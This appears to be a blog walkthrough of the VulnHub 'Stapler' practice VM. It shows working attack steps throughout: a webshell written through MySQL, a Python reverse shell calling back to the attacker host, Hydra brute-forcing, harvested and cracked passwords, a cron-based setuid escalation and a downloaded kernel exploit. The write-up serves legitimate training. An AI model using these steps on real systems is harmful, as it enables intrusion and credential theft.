Information Gathering
I started by doing an Nmap TCP and UDP scan to enumerate the services.PORT STATE SERVICE REASON VERSION 53/udp open domain udp-response ttl 64 dnsmasq 2.75 | dns-nsid: |_ bind.version: dnsmasq-2.75 68/udp open|filtered dhcpc no-response 69/udp open|filtered tftp no-response 137/udp open netbios-ns udp-response ttl 64 Samba nmbd netbios-ns (workgroup: WORKGROUP) 138/udp open|filtered netbios-dgm no-response MAC Address: 08:00:27:BB:06:52 (Oracle VirtualBox virtual NIC)
nmap -vv -n -Pn -p- -sV -A 192.168.56.102 Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-08-29 12:53 MDT NSE: Loaded 138 scripts for scanning. Host is up, received arp-response (0.00033s latency). Scanned at 2016-08-29 12:53:12 MDT for 157s Not shown: 65523 filtered ports Reason: 65523 no-responses PORT STATE SERVICE REASON VERSION 20/tcp closed ftp-data reset ttl 64 21/tcp open ftp syn-ack ttl 64 vsftpd 2.0.8 or later | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_Can't get directory listing: Can't parse PASV response: "Permission denied." 22/tcp open ssh syn-ack ttl 64 OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDc/xrBbi5hixT2B19dQilbbrCaRllRyNhtJcOzE8x0BM1ow9I80RcU7DtajyqiXXEwHRavQdO+/cHZMyOiMFZG59OCuIouLRNoVO58C91gzDgDZ1fKH6BDg+FaSz+iYZbHg2lzaMPbRje6oqNamPR4QGISNUpxZeAsQTLIiPcRlb5agwurovTd3p0SXe0GknFhZwHHvAZWa2J6lHE2b9K5IsSsDzX2WHQ4vPb+1DzDHV0RTRVUGviFvUX1X5tVFvVZy0TTFc0minD75CYClxLrgc+wFLPcAmE2C030ER/Z+9umbhuhCnLkLN87hlzDSRDPwUjWr+sNA3+7vc/xuZul | 256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA) |_ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNQB5n5kAZPIyHb9lVx1aU0fyOXMPUblpmB8DRjnP8tVIafLIWh54wmTFVd3nCMr1n5IRWiFeX1weTBDSjjz0IY= 53/tcp open domain syn-ack ttl 64 dnsmasq 2.75 | dns-nsid: |_ bind.version: dnsmasq-2.75 80/tcp open http syn-ack ttl 64 | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-title: 404 Not Found 123/tcp closed ntp reset ttl 64 137/tcp closed netbios-ns reset ttl 64 138/tcp closed netbios-dgm reset ttl 64 139/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP) 666/tcp open doom? syn-ack ttl 64 3306/tcp open mysql syn-ack ttl 64 MySQL 5.7.12-0ubuntu1 | mysql-info: | Protocol: 53 | Version: .7.12-0ubuntu1 | Thread ID: 8 | Capabilities flags: 63487 | Some Capabilities: FoundRows, Support41Auth, SupportsCompression, Speaks41ProtocolOld, IgnoreSpaceBeforeParenthesis, LongColumnFlag, DontAllowDatabaseTableColumn, SupportsTransactions, ODBCClient, IgnoreSigpipes, Speaks41ProtocolNew, InteractiveClient, LongPassword, SupportsLoadDataLocal, ConnectWithDatabase | Status: Autocommit |_ Salt: I)\x19f\x1CHS\j+2c\x1DnmS+y?c 12380/tcp open http syn-ack ttl 64 Apache httpd 2.4.18 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Tim, we need to-do better next year for Initech
Local Privilege
Local Privilege 1: HTTPS 12380
Due to the fact there is no index.html, I check robots.txt.https://192.168.56.102:12380/robots.txt
User-agent: *
Disallow: /admin112233/
Disallow: /blogblog/
I see that admin112233 is unfinished but blogblog is a Wordpress application! I then run wpscan on it to enumerate the vulnerabilities.
wpscan -u https://192.168.56.102:12380/blogblog/ --enumerate u [+] Enumerating usernames ... [+] Identified the following 10 user/s: +----+---------+-----------------+ | Id | Login | Name | +----+---------+-----------------+ | 1 | john | John Smith | | 2 | elly | Elly Jones | | 3 | peter | Peter Parker | | 4 | barry | Barry Atkins | | 5 | heather | Heather Neville | | 6 | garry | garry | | 7 | harry | harry | | 8 | scott | scott | | 9 | kathy | kathy | | 10 | tim | tim | +----+---------+-----------------+ wpscan -u https://192.168.56.102:12380/blogblog/ --enumerate ap [+] Name: advanced-video-embed-embed-videos-or-playlists - v1.0 | Latest version: 1.0 (up to date) | Location: https://192.168.56.102:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/ | Readme: https://192.168.56.102:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/readme.txt [!] Directory listing is enabled: https://192.168.56.102:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/
I find that advanced-video-embed-embed-videos-or-playlists - v1.0 has a local file inclusion vulnerability on Exploit-db. This can be found at: https://www.exploit-db.com/exploits/39646/. I am able to download the exploit and modify it for SSL using the following code.
import ssl ssl._create_default_https_context = ssl._create_unverified_context url = "https://192.168.56.102:12380/blogblog"
With this vulnerability, I was able to download both wp-config.php and /etc/passwd. After executing the file, I browsed to: https://192.168.56.102:12380/blogblog/wp-content/uploads/ to see the random id assigned to my file. If you attempt to view this in the browser it will fail because it cannot render a configuration as a jpeg. I pulled down the text with curl.
../wp-config.php define('DB_NAME', 'wordpress'); /** MySQL database username */ define('DB_USER', 'root'); /** MySQL database password */ define('DB_PASSWORD', 'plbkac'); /** MySQL hostname */ define('DB_HOST', 'localhost'); ../../../../etc/passwd root:x:0:0:root:/root:/bin/zsh ... www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin ... peter:x:1000:1000:Peter,,,:/home/peter:/bin/zsh mysql:x:111:117:MySQL Server,,,:/nonexistent:/bin/false RNunemaker:x:1001:1001::/home/RNunemaker:/bin/bash ETollefson:x:1002:1002::/home/ETollefson:/bin/bash DSwanger:x:1003:1003::/home/DSwanger:/bin/bash AParnell:x:1004:1004::/home/AParnell:/bin/bash SHayslett:x:1005:1005::/home/SHayslett:/bin/bash MBassin:x:1006:1006::/home/MBassin:/bin/bash JBare:x:1007:1007::/home/JBare:/bin/bash LSolum:x:1008:1008::/home/LSolum:/bin/bash IChadwick:x:1009:1009::/home/IChadwick:/bin/false MFrei:x:1010:1010::/home/MFrei:/bin/bash SStroud:x:1011:1011::/home/SStroud:/bin/bash CCeaser:x:1012:1012::/home/CCeaser:/bin/dash JKanode:x:1013:1013::/home/JKanode:/bin/bash CJoo:x:1014:1014::/home/CJoo:/bin/bash Eeth:x:1015:1015::/home/Eeth:/usr/sbin/nologin LSolum2:x:1016:1016::/home/LSolum2:/usr/sbin/nologin JLipps:x:1017:1017::/home/JLipps:/bin/sh jamie:x:1018:1018::/home/jamie:/bin/sh Sam:x:1019:1019::/home/Sam:/bin/zsh Drew:x:1020:1020::/home/Drew:/bin/bash jess:x:1021:1021::/home/jess:/bin/bash SHAY:x:1022:1022::/home/SHAY:/bin/bash Taylor:x:1023:1023::/home/Taylor:/bin/sh mel:x:1024:1024::/home/mel:/bin/bash kai:x:1025:1025::/home/kai:/bin/sh zoe:x:1026:1026::/home/zoe:/bin/bash NATHAN:x:1027:1027::/home/NATHAN:/bin/bash www:x:1028:1028::/home/www: postfix:x:112:118::/var/spool/postfix:/bin/false ftp:x:110:116:ftp daemon,,,:/var/ftp:/bin/false elly:x:1029:1029::/home/elly:/bin/bash
Using the root password, you can enumerate and get a shell with either phpmyadmin or mysql remote access. I chose mysql remote access.
mysql -u root -p -h 192.168.56.102 show databases; use wordpress; show tables; mysql> Select user_login, user_pass from wp_users; +------------+------------------------------------+ | user_login | user_pass | +------------+------------------------------------+ | John | $P$B7889EMq/erHIuZapMB8GEizebcIy9. | | Elly | $P$BlumbJRRBit7y50Y17.UPJ/xEgv4my0 | | Peter | $P$BTzoYuAFiBA5ixX2njL0XcLzu67sGD0 | | barry | $P$BIp1ND3G70AnRAkRY41vpVypsTfZhk0 | | heather | $P$Bwd0VpK8hX4aN.rZ14WDdhEIGeJgf10 | | garry | $P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1 | | harry | $P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0 | | scott | $P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1 | | kathy | $P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0 | | tim | $P$BXDR7dLIJczwfuExJdpQqRsNf.9ueN0 | | ZOE | $P$B.gMMKRP11QOdT5m1s9mstAUEDjagu1 | | Dave | $P$Bl7/V9Lqvu37jJT.6t4KWmY.v907Hy. | | Simon | $P$BLxdiNNRP008kOQ.jE44CjSK/7tEcz0 | | Abby | $P$ByZg5mTBpKiLZ5KxhhRe/uqR.48ofs. | | Vicki | $P$B85lqQ1Wwl2SqcPOuKDvxaSwodTY131 | | Pam | $P$BuLagypsIJdEuzMkf20XyS5bRm00dQ0 | +------------+------------------------------------+ mysql> Select "<?php echo shell_exec($_GET['cmd']);?>" into outfile "/var/www/https/blogblog/wp-content/uploads/shell.php"; Query OK, 1 row affected (0.00 sec)
I was then able to access the shell via curl
curl -k https://192.168.56.102:12380/blogblog/wp-content/uploads/shell.php?cmd=ifconfig enp0s3 Link encap:Ethernet HWaddr 08:00:27:bb:06:52 inet addr:192.168.56.102 Bcast:192.168.56.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:343006 errors:0 dropped:0 overruns:0 frame:0 TX packets:154479 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:46270812 (46.2 MB) TX bytes:56110368 (56.1 MB) Interrupt:10 Base address:0xd000 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:180 errors:0 dropped:0 overruns:0 frame:0 TX packets:180 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1 RX bytes:24245 (24.2 KB) TX bytes:24245 (24.2 KB)
Since webshells are poor, I upgraded to a more stable shell using python and then using python after to obtain at TTY.
https://192.168.56.102:12380/blogblog/wp-content/uploads/shell.php?cmd=python%20-c%20'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.101",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' python -c 'import pty;pty.spawn("/bin/bash")'
There are other things you can enumerate such as:
I formatted the passwords and used John to crack them to the best of my ability.
john stapler.wpusers Elly:ylle garry:football harry:monkey scott:cookie tim:thumb Simon:TOM 6 password hashes cracked, 10 left
Local Privilege 2: Bruteforce
I was able to enumerate users for a bruteforce three ways: banners, SMB, and FTP.Banner User Enumeration
This method is pretty self explanatory. By probing the banners, I am able to find users to bruteforce.FTP: Harry, Elly, John SSH: Barry SMB: Kathy, Fred HTTPS: Tim
SMB User Enumeration
By using enum4linux against a verbose SMB, I am able to enumerate the users for a bruteforce.
enum4linux 192.168.56.102 S-1-22-1-1000 Unix User\peter (Local User) S-1-22-1-1001 Unix User\RNunemaker (Local User) S-1-22-1-1002 Unix User\ETollefson (Local User) S-1-22-1-1003 Unix User\DSwanger (Local User) S-1-22-1-1004 Unix User\AParnell (Local User) S-1-22-1-1006 Unix User\MBassin (Local User) S-1-22-1-1007 Unix User\JBare (Local User) S-1-22-1-1008 Unix User\LSolum (Local User) S-1-22-1-1009 Unix User\IChadwick (Local User) S-1-22-1-1010 Unix User\MFrei (Local User) S-1-22-1-1011 Unix User\SStroud (Local User) S-1-22-1-1012 Unix User\CCeaser (Local User) S-1-22-1-1013 Unix User\JKanode (Local User) S-1-22-1-1014 Unix User\CJoo (Local User) S-1-22-1-1015 Unix User\Eeth (Local User) S-1-22-1-1016 Unix User\LSolum2 (Local User) S-1-22-1-1017 Unix User\JLipps (Local User) S-1-22-1-1018 Unix User\jamie (Local User) S-1-22-1-1020 Unix User\Drew (Local User) S-1-22-1-1021 Unix User\jess (Local User) S-1-22-1-1023 Unix User\Taylor (Local User) S-1-22-1-1025 Unix User\kai (Local User) S-1-22-1-1026 Unix User\zoe (Local User) S-1-22-1-1027 Unix User\NATHAN (Local User) S-1-22-1-1028 Unix User\www (Local User) S-1-22-1-1029 Unix User\elly (Local User)
FTP User Enumeration
Using Anonymous logins, I am able to enumerate some users.21/tcp open ftp syn-ack ttl 64 vsftpd 2.0.8 or later | ftp-anon: Anonymous FTP login allowed (FTP code 230) root@kali:~/Downloads# ftp 192.168.56.102 Connected to 192.168.56.102. 220- 220-|-----------------------------------------------------------------------------------------| 220-| Harry, make sure to update the banner when you get a chance to show who has access here | 220-|-----------------------------------------------------------------------------------------| 220- 220 Name (192.168.56.102:root): Anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -rw-r--r-- 1 0 0 107 Jun 03 23:06 note 226 Directory send OK. ftp> get note local: note remote: note 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for note (107 bytes). 226 Transfer complete. 107 bytes received in 0.00 secs (50.1884 kB/s) ftp> ^C ftp> 221 Goodbye. root@kali:~/Downloads# cat note Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.
The Attack
I am then able to use the users I found, to bruteforce the ftp users.root@kali:~/Downloads# hydra -L users.txt -e nsr 192.168.56.102 ftp Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2016-08-29 16:33:53 [DATA] max 9 tasks per 1 server, overall 64 tasks, 9 login tries (l:3/p:3), ~0 tries per task [DATA] attacking service ftp on port 21 [21][ftp] host: 192.168.56.102 login: elly password: ylle 1 of 1 target successfully completed, 1 valid password found Hydra (http://www.thc.org/thc-hydra) finished at 2016-08-29 16:33:57
I am then able to FTP login as Elly and pull down all the sensitive files. The most useful file to pull down is /etc/passwd and use it to ssh bruteforce. Using this, I am able to obtain a a local shell as SHayslett.
root@kali:~/Downloads# ftp 192.168.56.102 Connected to 192.168.56.102. 220- 220-|-----------------------------------------------------------------------------------------| 220-| Harry, make sure to update the banner when you get a chance to show who has access here | 220-|-----------------------------------------------------------------------------------------| 220- 220 Name (192.168.56.102:root): elly 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> get passwd local: passwd remote: passwd 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for passwd (2942 bytes). 226 Transfer complete. 2942 bytes received in 0.00 secs (35.0714 MB/s) ftp> get shadow local: shadow remote: shadow 200 PORT command successful. Consider using PASV. 550 Failed to open file. ftp> get vsftpd.conf local: vsftpd.conf remote: vsftpd.conf 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for vsftpd.conf (5961 bytes). 226 Transfer complete. 5961 bytes received in 0.00 secs (50.3084 MB/s) ftp> get ftpusers local: ftpusers remote: ftpusers 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for ftpusers (132 bytes). 226 Transfer complete. 132 bytes received in 0.00 secs (1.6564 MB/s) ftp> 221 Goodbye. root@kali:~/Downloads# cat passwd root:x:0:0:root:/root:/bin/zsh peter:x:1000:1000:Peter,,,:/home/peter:/bin/zsh mysql:x:111:117:MySQL Server,,,:/nonexistent:/bin/false RNunemaker:x:1001:1001::/home/RNunemaker:/bin/bash ETollefson:x:1002:1002::/home/ETollefson:/bin/bash DSwanger:x:1003:1003::/home/DSwanger:/bin/bash AParnell:x:1004:1004::/home/AParnell:/bin/bash SHayslett:x:1005:1005::/home/SHayslett:/bin/bash MBassin:x:1006:1006::/home/MBassin:/bin/bash JBare:x:1007:1007::/home/JBare:/bin/bash LSolum:x:1008:1008::/home/LSolum:/bin/bash IChadwick:x:1009:1009::/home/IChadwick:/bin/false MFrei:x:1010:1010::/home/MFrei:/bin/bash SStroud:x:1011:1011::/home/SStroud:/bin/bash CCeaser:x:1012:1012::/home/CCeaser:/bin/dash JKanode:x:1013:1013::/home/JKanode:/bin/bash CJoo:x:1014:1014::/home/CJoo:/bin/bash Eeth:x:1015:1015::/home/Eeth:/usr/sbin/nologin LSolum2:x:1016:1016::/home/LSolum2:/usr/sbin/nologin JLipps:x:1017:1017::/home/JLipps:/bin/sh jamie:x:1018:1018::/home/jamie:/bin/sh Sam:x:1019:1019::/home/Sam:/bin/zsh Drew:x:1020:1020::/home/Drew:/bin/bash jess:x:1021:1021::/home/jess:/bin/bash SHAY:x:1022:1022::/home/SHAY:/bin/bash Taylor:x:1023:1023::/home/Taylor:/bin/sh mel:x:1024:1024::/home/mel:/bin/bash kai:x:1025:1025::/home/kai:/bin/sh zoe:x:1026:1026::/home/zoe:/bin/bash NATHAN:x:1027:1027::/home/NATHAN:/bin/bash www:x:1028:1028::/home/www: postfix:x:112:118::/var/spool/postfix:/bin/false ftp:x:110:116:ftp daemon,,,:/var/ftp:/bin/false elly:x:1029:1029::/home/elly:/bin/bash awk -F':' '{ print $1}' passwd > users.txt root@kali:~/Downloads# hydra -L users.txt -e nsr 192.168.56.102 ssh Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2016-08-29 16:44:16 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 64 tasks, 183 login tries (l:61/p:3), ~0 tries per task [DATA] attacking service ssh on port 22 [22][ssh] host: 192.168.56.102 login: SHayslett password: SHayslett 1 of 1 target successfully completed, 1 valid password found Hydra (http://www.thc.org/thc-hydra) finished at 2016-08-29 16:45:13
Local Privilege 3: TFTP
I am able to target TFTP and, without authentication, upload the shell directly to the web server on port 80.root@kali:/var/www# tftp 192.168.56.102 tftp> ls ?Invalid command tftp> verbose Verbose mode on. tftp> put shell.php putting shell.php to 192.168.56.102:shell.php [netascii] Sent 3605 bytes in 0.0 seconds [inf bits/sec] tftp>
I set up a listener and, once the shell spawns, I get a TTY using python.
root@kali:~/Downloads# nc -nlvp 443 listening on [any] 443 ... connect to [192.168.56.101] from (UNKNOWN) [192.168.56.102] 49622 Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux 18:05:58 up 4:15, 1 user, load average: 0.00, 0.01, 0.05 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT JKanode pts/2 192.168.56.101 16:04 1:36m 0.08s 0.11s sshd: JKanode [priv] uid=1028(www) gid=1028(www) groups=1028(www) /bin/sh: 0: can't access tty; job control turned off $ python -c 'import pty;pty.spawn("/bin/bash")' www@red:/$
Privilege Escalation
Privilege Escalation 1: Bash History
Using bash, I was able to script print all the bash histories. I found that a user's history contains a username and password for two users.www-data@red:/home$ find -name ".bash_history" -exec cat {} \; find -name ".bash_history" -exec cat {} \; ... id cat: ./peter/.bash_history: Permission denied find: './peter/.cache': Permission denied exit id whoami ls -lah pwd ps aux sshpass -p thisimypassword ssh JKanode@localhost apt-get install sshpass sshpass -p JZQuyIN5 peter@localhost ...
I then learn that Peter has root privilege in the sudoers file. From this, I am able to change the shell to /bin/bash (because I don't like zsh) and print our flag.txt
ssh peter@192.168.56.102 red% sudo -l We trust you have received the usual lecture from the local System Administrator. It usually boils down to these three things: #1) Respect the privacy of others. #2) Think before you type. #3) With great power comes great responsibility. [sudo] password for peter: Matching Defaults entries for peter on red: lecture=always, env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User peter may run the following commands on red: (ALL : ALL) ALL red% sudo usermod -s /bin/bash peter peter@red:~$ sudo -i ➜ ~ cd /root ➜ ~ ls fix-wordpress.sh flag.txt issue python.sh wordpress.sql ➜ ~ cat flag.txt ~~~~~~~~~~<(Congratulations)>~~~~~~~~~~ .-'''''-. |'-----'| |-.....-| | | | | _,._ | | __.o` o`"-. | | .-O o `"-.o O )_,._ | | ( o O o )--.-"`O o"-.`'-----'` '--------' ( o O o) `----------`
Privilege Escalation 2: SUID
Once I have a local shell, I can search for potential vulnerabilities using the Linux Priv Checker. This can be found at: http://www.securitysift.com/download/linuxprivchecker.py. Using this script, I am able to find a world writable cron job.python linuxprivchecker.py > linuxpriv.txt less linuxpriv.txt [+] World Writable Files -rw-rw-rw- 1 mysql mysql 39 Aug 29 15:24 /var/www/https/blogblog/wp-content/uploads/shell.php -rwxrwxrwx 1 www www 0 Jun 3 14:48 /etc/authbind/byport/80 -rwxrwxrwx 1 root root 51 Jun 3 20:41 /usr/local/sbin/cron-logrotate.sh JKanode@red:/tmp$ cat /usr/local/sbin/cron-logrotate.sh #Simon, you really need to-do something about this
I am then able to change the world writable cron to my own suid setter file that I will make. I then create and compile that suid program. Once the cron is run, I will have a nice file to execute to get root.
JKanode@red:/tmp$ echo -e 'chown root:root /tmp/setuid;chmod 4777 /tmp/setuid;' > /usr/local/sbin/cron-logrotate.sh JKanode@red:/tmp$ echo -e '#include <stdio.h>\n#include <sys/types.h>\n#include <unistd.h>\n\nint main(void){\n\tsetuid(0);\n\tsetgid(0);\n\tsystem("/bin/bash");\n}' > setuid.c JKanode@red:/tmp$ gcc setuid.c -o setuid setuid.c: In function ‘main’: setuid.c:8:2: warning: implicit declaration of function ‘system’ [-Wimplicit-function-declaration] system("/bin/bash"); JKanode@red:/tmp$ ./setuid root@red:/tmp# cat /root/flag.txt ~~~~~~~~~~<(Congratulations)>~~~~~~~~~~ .-'''''-. |'-----'| |-.....-| | | | | _,._ | | __.o` o`"-. | | .-O o `"-.o O )_,._ | | ( o O o )--.-"`O o"-.`'-----'` '--------' ( o O o) `----------` b6b545dc11b7a270f4bad23432190c75162c4a2b
Privilege Escalation 3: Kernel Exploit
First, I get the kernel version information.JKanode@red: uname -a
Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
Next, I find online the Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' in bpf(BPF_PROG_LOAD) at https://www.exploit-db.com/exploits/39772/. I download the exploit, untar the file, compile, and execute the exploit.
wget https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552 tar -xvf exploit.tar cd ebpf_mapfd_doubleput_exploit ./compile.sh ./doubleput root@red:/tmp/ebpf_mapfd_doubleput_exploit# cat /root/flag.txt ~~~~~~~~~~<(Congratulations)>~~~~~~~~~~ .-'''''-. |'-----'| |-.....-| | | | | _,._ | | __.o` o`"-. | | .-O o `"-.o O )_,._ | | ( o O o )--.-"`O o"-.`'-----'` '--------' ( o O o) `----------` b6b545dc11b7a270f4bad23432190c75162c4a2b
I hope this helps everyone to crack this awesome VM.
Thanks to g0tmilk for creating the VM. But most of all for hosting vulnhub.com so we have awesome VM's to practice on.
No comments:
Post a Comment